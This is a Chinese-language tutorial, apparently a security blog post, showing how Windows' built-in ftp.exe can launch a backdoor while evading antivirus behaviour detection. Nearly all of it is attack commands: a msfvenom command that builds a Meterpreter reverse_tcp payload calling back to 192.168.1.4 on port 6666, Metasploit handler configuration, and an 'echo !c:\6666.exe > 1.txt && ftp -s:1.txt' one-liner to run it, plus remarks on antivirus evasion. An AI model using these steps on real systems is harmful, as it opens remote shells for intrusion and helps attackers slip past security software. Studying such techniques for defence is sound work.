1. 概述

  1. 本文来自互联网,个人只是进行验证与复现。

杀软行为检测:不会触发行为预警
Ftp.exe是Windows本身自带的一个程序,属于微软FTP工具,提供基本的FTP访问。
Windows 2003 默认位置:

  1. C:\Windows\System32\ftp.exe
  2. C:\Windows\SysWOW64\ftp.exe

Windows 7 默认位置:

  1. C:\Windows\System32\ftp.exe
  2. C:\Windows\SysWOW64\ftp.exe

执行方式:

  1. echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt

2. 利用

2.1 生成shellcode

  1.  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=6666 -f exe > 6666.exe

image.png

2.2 配置监听

2.2.1 方法一

这种常规的方法,比较简单,可以使用这种方法。

  1. handler -H 192.168.1.4 -P 6666 -p windows/meterpreter/reverse_tcp

image.png

2.2.2 方法二

  1. msf6 > use exploit/multi/handler 
  2. msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
  3. msf6 exploit(multi/handler) > set autorunscript  
  4. msf6 exploit(multi/handler) > set autorunscript  migrate -f
  5. msf6 exploit(multi/handler) > set lhost 192.168.1.4
  6. msf6 exploit(multi/handler) > set lport 6666
  7. msf6 exploit(multi/handler) > run

image.png

2.3 执行shellcode

把后门文件放到c盘下,然后使用下面命令来执行

  1. echo !c:\6666.exe > 1.txt && ftp -s:1.txt

image.png
可以看到成功上线
image.png

3. 免杀

所有的白加黑这一块免杀主要还是靠恶意文件来免杀,白名单虽然有一定可能性绕过杀软,但是主要并不是所有的安全软件都会对白名单放行的,所以这一块还是要进行恶意文件的免杀,白名单这种是可行性的方式。这一系列主要还是验证和复现这种白名单的操作方法和可行性。